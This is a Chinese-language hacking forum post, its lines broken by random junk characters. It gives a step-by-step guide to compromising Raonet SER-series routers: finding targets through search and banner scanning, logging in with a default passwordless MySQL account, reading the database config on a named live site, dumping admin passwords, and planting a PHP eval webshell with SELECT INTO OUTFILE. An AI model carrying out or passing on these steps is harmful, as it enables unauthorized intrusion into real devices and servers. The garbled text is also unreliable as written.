寻找存在漏洞的路由器方法:
) l. a; m( z f, h9 g5 S. G. w6 Z5 o0 n/ A7 n! ~! J. W4 _
1:google搜索'Raonet Subscriber Ethernet Router'5 x% b, s$ n, o3 Z5 N
) q* m) C, L' p$ W. S
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
! r0 m, _- X% m% W% p. @* r4 v: u+ j7 r1 Z5 D8 _7 R
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。* r3 F; B0 n# C) L U* {- _
- _5 |7 o" X5 L+ v4 Z, p/ ~# c
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......8 u6 Q9 E; Y1 X, ^0 A( c
+ V l1 B# \4 o: F, A2 c- N- D ! Q$ ]; z, H2 ?9 x5 S
4 ^) `/ e8 K, r) E' ^, _4 ]
入侵步骤:4 w) J! f* {% @. `" D, T4 e
7 N& {6 E0 d j1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php% e1 n% T- B* d2 y
7 |. V0 [+ ~) [6 T% r2 U2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
3 Q/ A1 H& T$ S3:得到密码后连接,查看GUI管理密码:
7 o. o' D% C$ w$ n2 iuse ser_500
! Z L- Z1 i a2 \" Fselect id,passwd from user;( L% {7 u7 C1 Y; T5 ]
4:通过数据库写入webshell,执行命令:; h! p0 l6 q: |9 v
use mysql;3 R3 J# S4 R) _
create table ok(cmd TEXT);
S( B; a R# P) z+ c4 u2 |3 O. Minsert into ok values("<?php @eval($_POST[cmd])?>");/ @1 T% _9 e& V) m* j7 y
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
; _ o0 N. F7 M$ B: ldrop table ok;
* D: u+ d( R" x% I( l Z/ y9 r0 Z' ~0 z3 ?/ ?- S+ P
5:连接后门shell.php : h; |1 E7 K+ T3 k0 m5 M' _6 M3 F
! A0 t% w& l+ N3 ^7 P9 T; l
6. 搞定!) g" ~1 y p% Y1 x# w
& t* O! D. O% f0 P7 b" i- s
|